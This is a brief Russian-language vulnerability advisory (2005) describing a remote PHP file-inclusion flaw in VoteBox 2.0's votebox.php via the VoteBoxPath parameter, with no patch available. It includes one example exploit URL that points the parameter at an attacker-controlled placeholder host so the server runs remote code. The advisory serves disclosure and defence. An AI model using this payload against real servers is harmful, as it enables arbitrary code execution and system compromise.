PHP-инклюдинг в VoteBox

Дата публикации:16.03.2005
Всего просмотров:935
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: VoteBox 2.x
Уязвимые версии: VoteBox 2.0

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный php сценарий на уязвимом сервере.

Отсутствует должная обработка входных данных в переменой VoteBoxPath сценария 'votebox.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий на системе с привилегиями web сервера. Пример:

http://[target]/votebox.php?VoteBoxPath=http://[attacker]

URL производителя: http://www.phpbeispiele.ch/index.php?Include=20

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: VoteBox Remote File Include